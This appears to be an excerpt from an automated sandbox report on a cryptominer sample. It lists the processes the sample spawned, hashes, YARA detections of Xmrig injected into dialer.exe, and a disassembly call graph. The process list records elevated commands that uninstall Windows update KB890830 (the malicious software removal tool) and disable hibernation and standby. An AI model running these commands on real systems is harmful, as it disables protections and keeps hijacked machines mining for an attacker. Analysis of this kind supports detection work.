                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:32
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff7caad0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:33
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:34
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:35
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:36
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:37
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:38
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff71a810000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:39
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:40
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff791450000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:41
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:42
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff600680000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:43
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:44
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff600680000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:45
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:dialer.exe
                                                                              Imagebase:0x7ff600680000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:46
                                                                              Start time:16:58:12
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:47
                                                                              Start time:16:58:13
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:48
                                                                              Start time:16:58:13
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:49
                                                                              Start time:16:58:13
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:50
                                                                              Start time:16:58:14
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:51
                                                                              Start time:16:58:15
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:52
                                                                              Start time:16:58:15
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:53
                                                                              Start time:16:58:16
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:54
                                                                              Start time:16:58:17
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:55
                                                                              Start time:16:58:17
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:56
                                                                              Start time:16:58:17
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:57
                                                                              Start time:16:58:18
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:58
                                                                              Start time:16:58:18
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:59
                                                                              Start time:16:58:18
                                                                              Start date:04/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:3.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:10.2%
                                                                                Total number of Nodes:1950
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 5019 7ff749f4219e 5020 7ff749f421ab EnterCriticalSection 5019->5020 5021 7ff749f42272 5019->5021 5022 7ff749f42265 LeaveCriticalSection 5020->5022 5024 7ff749f421c8 5020->5024 5022->5021 5023 7ff749f421e9 TlsGetValue GetLastError 5023->5024 5024->5022 5024->5023 3083 7ff749f41140 3086 7ff749f41160 3083->3086 3085 7ff749f41156 3087 7ff749f411b9 3086->3087 3088 7ff749f4118b 3086->3088 3090 7ff749f411c7 _amsg_exit 3087->3090 3091 7ff749f411d3 3087->3091 3088->3087 3089 7ff749f41190 3088->3089 3089->3087 3092 7ff749f411a0 Sleep 3089->3092 3090->3091 3093 7ff749f4121a 3091->3093 3094 7ff749f41201 _initterm 3091->3094 3092->3087 3092->3089 3111 7ff749f41880 3093->3111 3094->3093 3097 7ff749f4126a 3098 7ff749f4126f malloc 3097->3098 3099 7ff749f4128b 3098->3099 3100 7ff749f412d2 3098->3100 3101 7ff749f412a0 strlen malloc memcpy 3099->3101 3124 7ff749f43b60 3100->3124 3101->3101 3102 7ff749f412d0 3101->3102 3102->3100 3104 7ff749f41315 3105 7ff749f41344 3104->3105 3106 7ff749f41324 3104->3106 3109 7ff749f41160 95 API calls 3105->3109 3107 7ff749f41338 3106->3107 3108 7ff749f4132d _cexit 3106->3108 3107->3085 3108->3107 3110 7ff749f41366 3109->3110 3110->3085 3112 7ff749f41247 SetUnhandledExceptionFilter 3111->3112 3113 7ff749f418a2 3111->3113 3112->3097 3113->3112 3114 7ff749f4194d 3113->3114 3115 7ff749f41a20 3113->3115 3116 7ff749f4199e 3114->3116 3117 7ff749f41956 3114->3117 3115->3116 3119 7ff749f41b5c 3115->3119 3121 7ff749f41b36 3115->3121 3116->3112 3120 7ff749f419e9 VirtualProtect 3116->3120 3117->3116 3312 7ff749f41ba0 3117->3312 3120->3116 3122 7ff749f41ba0 4 API calls 3121->3122 3123 7ff749f41b53 3122->3123 3123->3119 3127 7ff749f43b76 3124->3127 3125 7ff749f43c70 wcslen 3322 7ff749f4153f 3125->3322 3127->3125 3131 7ff749f43d70 3134 7ff749f43d8a memset wcscat memset 3131->3134 3136 7ff749f43de3 3134->3136 3137 7ff749f43e33 wcslen 3136->3137 3138 7ff749f43e45 3137->3138 3142 7ff749f43e8c 3137->3142 3139 7ff749f43e60 _wcsnicmp 3138->3139 3140 7ff749f43e76 wcslen 3139->3140 3139->3142 3140->3139 3140->3142 3141 7ff749f43eed wcscpy wcscat memset 3143 7ff749f43f2c 3141->3143 3142->3141 3144 7ff749f44034 wcscpy wcscat 3143->3144 3145 7ff749f4405f memset 3144->3145 3150 7ff749f44141 3144->3150 3146 7ff749f44080 3145->3146 3147 7ff749f440e5 wcslen 3146->3147 3149 7ff749f440fb 3147->3149 3154 7ff749f4413c 3147->3154 3151 7ff749f44110 _wcsnicmp 3149->3151 3540 7ff749f42df0 3150->3540 3152 7ff749f44126 wcslen 3151->3152 3151->3154 3152->3151 3152->3154 3153 7ff749f442f4 wcscpy wcscat _wcsicmp 3155 7ff749f44328 3153->3155 3156 7ff749f44341 memset 3153->3156 3154->3153 3552 7ff749f414d6 3155->3552 3159 7ff749f44362 3156->3159 3158 7ff749f443a7 wcscpy wcscat memset 3161 7ff749f443ed 3158->3161 3159->3158 3160 7ff749f4443d wcscpy wcscat memset 3162 7ff749f44483 3160->3162 3161->3160 3163 7ff749f444b3 wcscpy wcscat 3162->3163 3164 7ff749f46638 memcpy 3163->3164 3165 7ff749f444e5 3163->3165 3164->3165 3166 7ff749f42df0 11 API calls 3165->3166 3168 7ff749f44694 3166->3168 3167 7ff749f42df0 11 API calls 3169 7ff749f447a8 memset 3167->3169 3168->3167 3171 7ff749f447c9 3169->3171 3170 7ff749f4480c wcscpy wcscat memset 3173 7ff749f44855 3170->3173 3171->3170 3172 7ff749f44898 wcscpy wcscat wcslen 3615 7ff749f4146d 3172->3615 3173->3172 3176 7ff749f449a9 3178 7ff749f44a9f wcslen 3176->3178 3185 7ff749f44c92 3176->3185 3819 7ff749f4157b 3178->3819 3180 7ff749f4145e 2 API calls 3180->3176 3184 7ff749f44c71 memset 3184->3185 3186 7ff749f44d02 wcscpy wcscat 3185->3186 3190 7ff749f44d34 3186->3190 3187 7ff749f44c04 wcslen 3869 7ff749f415e4 3187->3869 3188 7ff749f44b5e 3188->3184 3188->3187 3193 7ff749f42df0 11 API calls 3190->3193 3192 7ff749f4145e 2 API calls 3192->3184 3194 7ff749f44e3c 3193->3194 3195 7ff749f42df0 11 API calls 3194->3195 3197 7ff749f44f51 3195->3197 3196 7ff749f42df0 11 API calls 3199 7ff749f4503e 3196->3199 3197->3196 3198 7ff749f42df0 11 API calls 3200 7ff749f45124 3198->3200 3199->3198 3872 7ff749f42f70 3200->3872 3202 7ff749f4513f 3876 7ff749f438f0 3202->3876 3207 7ff749f451a2 3209 7ff749f451ba 3207->3209 3210 7ff749f46935 memcpy 3207->3210 3208 7ff749f4145e 2 API calls 3208->3207 3211 7ff749f452ad wcslen 3209->3211 3210->3209 3212 7ff749f4157b 2 API calls 3211->3212 3213 7ff749f45337 3212->3213 3214 7ff749f4533f memset 3213->3214 3218 7ff749f45451 3213->3218 3215 7ff749f45360 3214->3215 3216 7ff749f453b0 wcslen 3215->3216 3966 7ff749f415a8 3216->3966 3217 7ff749f42df0 11 API calls 3225 7ff749f454f4 3217->3225 3218->3217 3226 7ff749f45634 _wcsicmp 3218->3226 3221 7ff749f45420 _wcsnicmp 3222 7ff749f45445 3221->3222 3228 7ff749f45c91 3221->3228 3223 7ff749f4145e 2 API calls 3222->3223 3223->3218 3224 7ff749f42df0 11 API calls 3224->3226 3225->3224 3229 7ff749f4564f memset 3226->3229 3244 7ff749f459ca 3226->3244 3227 7ff749f45cee wcslen 3230 7ff749f415a8 2 API calls 3227->3230 3228->3227 3234 7ff749f45673 3229->3234 3231 7ff749f45d4a 3230->3231 3235 7ff749f4145e 2 API calls 3231->3235 3232 7ff749f45aaa wcslen 3236 7ff749f4153f 2 API calls 3232->3236 3233 7ff749f456b8 wcscpy wcscat wcslen 3237 7ff749f4146d 2 API calls 3233->3237 3234->3233 3235->3218 3239 7ff749f45b35 3236->3239 3238 7ff749f45785 3237->3238 3983 7ff749f41530 3238->3983 3241 7ff749f4145e 2 API calls 3239->3241 3243 7ff749f45b46 3241->3243 3252 7ff749f42f70 2 API calls 3243->3252 3253 7ff749f45bd2 3243->3253 3244->3232 3245 7ff749f46da9 3247 7ff749f4145e 2 API calls 3245->3247 3246 7ff749f457c3 4028 7ff749f414a9 3246->4028 3250 7ff749f46db5 3247->3250 3249 7ff749f45c2f wcslen 3254 7ff749f45c45 3249->3254 3275 7ff749f45c8c 3249->3275 3250->3104 3256 7ff749f45b6f 3252->3256 3253->3249 3257 7ff749f45c60 _wcsnicmp 3254->3257 3255 7ff749f4585f 3260 7ff749f4145e 2 API calls 3255->3260 3259 7ff749f438f0 11 API calls 3256->3259 3261 7ff749f45c76 wcslen 3257->3261 3257->3275 3263 7ff749f45b8c 3259->3263 3264 7ff749f45853 3260->3264 3261->3257 3261->3275 3267 7ff749f414c7 2 API calls 3263->3267 4204 7ff749f43350 memset 3264->4204 3265 7ff749f45df9 memset wcscpy wcscat 3269 7ff749f42f70 2 API calls 3265->3269 3266 7ff749f45847 3270 7ff749f4145e 2 API calls 3266->3270 3271 7ff749f45bc4 3267->3271 3273 7ff749f45e50 3269->3273 3270->3264 3271->3253 3277 7ff749f4145e 2 API calls 3271->3277 3276 7ff749f43350 11 API calls 3273->3276 3274 7ff749f414c7 2 API calls 3282 7ff749f458ae 3274->3282 3275->3265 3278 7ff749f45e68 3276->3278 3277->3253 3279 7ff749f414c7 2 API calls 3278->3279 3280 7ff749f45e96 memset 3279->3280 3283 7ff749f45eb7 3280->3283 3281 7ff749f42df0 11 API calls 3290 7ff749f45937 3281->3290 3282->3281 3284 7ff749f45f07 wcslen 3283->3284 3285 7ff749f45f57 wcscat memset 3284->3285 3286 7ff749f45f19 3284->3286 3293 7ff749f45f91 3285->3293 3287 7ff749f45f30 _wcsnicmp 3286->3287 3287->3285 3289 7ff749f45f42 wcslen 3287->3289 3289->3285 3289->3287 3291 7ff749f42df0 11 API calls 3290->3291 3294 7ff749f44217 3291->3294 3292 7ff749f45fe1 wcscpy wcscat 3296 7ff749f46016 3292->3296 3293->3292 3294->3104 3295 7ff749f46d1d memcpy 3298 7ff749f46153 3295->3298 3296->3295 3296->3298 3297 7ff749f4620f wcslen 3299 7ff749f4153f 2 API calls 3297->3299 3298->3297 3300 7ff749f4629a 3299->3300 3301 7ff749f4145e 2 API calls 3300->3301 3302 7ff749f462ab 3301->3302 3303 7ff749f46343 3302->3303 3305 7ff749f42f70 2 API calls 3302->3305 3304 7ff749f4145e 2 API calls 3303->3304 3304->3294 3306 7ff749f462d8 3305->3306 3307 7ff749f438f0 11 API calls 3306->3307 3308 7ff749f462fd 3307->3308 3309 7ff749f414c7 2 API calls 3308->3309 3310 7ff749f46335 3309->3310 3310->3303 3311 7ff749f4145e 2 API calls 3310->3311 3311->3303 3313 7ff749f41bc2 3312->3313 3314 7ff749f41c04 memcpy 3313->3314 3316 7ff749f41c45 VirtualQuery 3313->3316 3317 7ff749f41cf4 3313->3317 3314->3117 3316->3317 3321 7ff749f41c72 3316->3321 3318 7ff749f41d23 GetLastError 3317->3318 3319 7ff749f41d37 3318->3319 3320 7ff749f41ca4 VirtualProtect 3320->3314 3320->3318 3321->3314 3321->3320 4220 7ff749f41394 3322->4220 3324 7ff749f4154e 3325 7ff749f41394 2 API calls 3324->3325 3326 7ff749f41558 3325->3326 3327 7ff749f4155d 3326->3327 3328 7ff749f41394 2 API calls 3326->3328 3329 7ff749f41394 2 API calls 3327->3329 3328->3327 3330 7ff749f41567 3329->3330 3331 7ff749f4156c 3330->3331 3332 7ff749f41394 2 API calls 3330->3332 3333 7ff749f41394 2 API calls 3331->3333 3332->3331 3334 7ff749f41576 3333->3334 3335 7ff749f4157b 3334->3335 3336 7ff749f41394 2 API calls 3334->3336 3337 7ff749f41394 2 API calls 3335->3337 3336->3335 3338 7ff749f41585 3337->3338 3339 7ff749f4158a 3338->3339 3340 7ff749f41394 2 API calls 3338->3340 3341 7ff749f41394 2 API calls 3339->3341 3340->3339 3342 7ff749f41599 3341->3342 3343 7ff749f41394 2 API calls 3342->3343 3344 7ff749f415a3 3343->3344 3345 7ff749f415a8 3344->3345 3346 7ff749f41394 2 API calls 3344->3346 3347 7ff749f41394 2 API calls 3345->3347 3346->3345 3348 7ff749f415b7 3347->3348 3349 7ff749f41394 2 API calls 3348->3349 3350 7ff749f415c1 3349->3350 3351 7ff749f415c6 3350->3351 3352 7ff749f41394 2 API calls 3350->3352 3353 7ff749f41394 2 API calls 3351->3353 3352->3351 3354 7ff749f415d0 3353->3354 3355 7ff749f415d5 3354->3355 3356 7ff749f41394 2 API calls 3354->3356 3357 7ff749f41394 2 API calls 3355->3357 3356->3355 3358 7ff749f415df 3357->3358 3359 7ff749f415e4 3358->3359 3360 7ff749f41394 2 API calls 3358->3360 3361 7ff749f41394 2 API calls 3359->3361 3360->3359 3362 7ff749f415f3 3361->3362 3362->3294 3363 7ff749f41503 3362->3363 3364 7ff749f41394 2 API calls 3363->3364 3365 7ff749f41512 3364->3365 3366 7ff749f41394 2 API calls 3365->3366 3367 7ff749f41521 3366->3367 3368 7ff749f41530 3367->3368 3369 7ff749f41394 2 API calls 3367->3369 3370 7ff749f41394 2 API calls 3368->3370 3369->3368 3371 7ff749f4153a 3370->3371 3372 7ff749f4153f 3371->3372 3373 7ff749f41394 2 API calls 3371->3373 3374 7ff749f41394 2 API calls 3372->3374 3373->3372 3375 7ff749f4154e 3374->3375 3376 7ff749f41394 2 API calls 3375->3376 3377 7ff749f41558 3376->3377 3378 7ff749f4155d 3377->3378 3379 7ff749f41394 2 API calls 3377->3379 3380 7ff749f41394 2 API calls 3378->3380 3379->3378 3381 7ff749f41567 3380->3381 3382 7ff749f4156c 3381->3382 3383 7ff749f41394 2 API calls 3381->3383 3384 7ff749f41394 2 API calls 3382->3384 3383->3382 3385 7ff749f41576 3384->3385 3386 7ff749f4157b 3385->3386 3387 7ff749f41394 2 API calls 3385->3387 3388 7ff749f41394 2 API calls 3386->3388 3387->3386 3389 7ff749f41585 3388->3389 3390 7ff749f4158a 3389->3390 3391 7ff749f41394 2 API calls 3389->3391 3392 7ff749f41394 2 API calls 3390->3392 3391->3390 3393 7ff749f41599 3392->3393 3394 7ff749f41394 2 API calls 3393->3394 3395 7ff749f415a3 3394->3395 3396 7ff749f415a8 3395->3396 3397 7ff749f41394 2 API calls 3395->3397 3398 7ff749f41394 2 API calls 3396->3398 3397->3396 3399 7ff749f415b7 3398->3399 3400 7ff749f41394 2 API calls 3399->3400 3401 7ff749f415c1 3400->3401 3402 7ff749f415c6 3401->3402 3403 7ff749f41394 2 API calls 3401->3403 3404 7ff749f41394 2 API calls 3402->3404 3403->3402 3405 7ff749f415d0 3404->3405 3406 7ff749f415d5 3405->3406 3407 7ff749f41394 2 API calls 3405->3407 3408 7ff749f41394 2 API calls 3406->3408 3407->3406 3409 7ff749f415df 3408->3409 3410 7ff749f415e4 3409->3410 3411 7ff749f41394 2 API calls 3409->3411 3412 7ff749f41394 2 API calls 3410->3412 3411->3410 3413 7ff749f415f3 3412->3413 3413->3131 3414 7ff749f4156c 3413->3414 3415 7ff749f41394 2 API calls 3414->3415 3416 7ff749f41576 3415->3416 3417 7ff749f4157b 3416->3417 3418 7ff749f41394 2 API calls 3416->3418 3419 7ff749f41394 2 API calls 3417->3419 3418->3417 3420 7ff749f41585 3419->3420 3421 7ff749f4158a 3420->3421 3422 7ff749f41394 2 API calls 3420->3422 3423 7ff749f41394 2 API calls 3421->3423 3422->3421 3424 